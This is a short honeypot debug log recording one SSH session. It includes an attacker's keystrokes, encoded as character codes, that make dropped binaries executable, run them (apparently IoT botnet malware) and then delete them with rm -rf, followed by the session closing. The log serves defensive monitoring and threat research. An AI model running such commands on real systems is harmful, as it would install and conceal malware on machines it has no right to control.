2022-10-22 23:05:08.824 - [Debug] [SHELL] Keystroke buffer: 99,104,109,111,100,32,55,55,55,32,103,97,121,59,46,47,103,97,121,32,59,99,104,109,111,100,32,55,55,55,32,115,115,104,100,100,110,105,103,59,32,46,47,115,115,104,100,100,110,105,103,32,115,115,104,46,109,105,112,115,46,101,99,104,111,59,32,114,109,32,45,114,102,32,103,97,121,59,32,114,109,32,45,114,102,32,115,115,104,100,100,110,105,103,10
2022-10-22 23:05:38.523 - [Debug] [SHELL] Attacker ended the shell
2022-10-22 23:05:38.832 - [Debug] [Connection] Attacker closed connection
2022-10-22 23:05:38.849 - [Debug] [LXC] Container's OpenSSH server ended connection
2022-10-22 23:05:38.849 - [Debug] [LXC] Container's OpenSSH server closed connection
2022-10-22 23:05:38.850 - [Debug] [LXC Streams] Removed Stream | Total streams: 0
2022-10-22 23:05:38.850 - [Debug] [SHELL] Honeypot ended shell
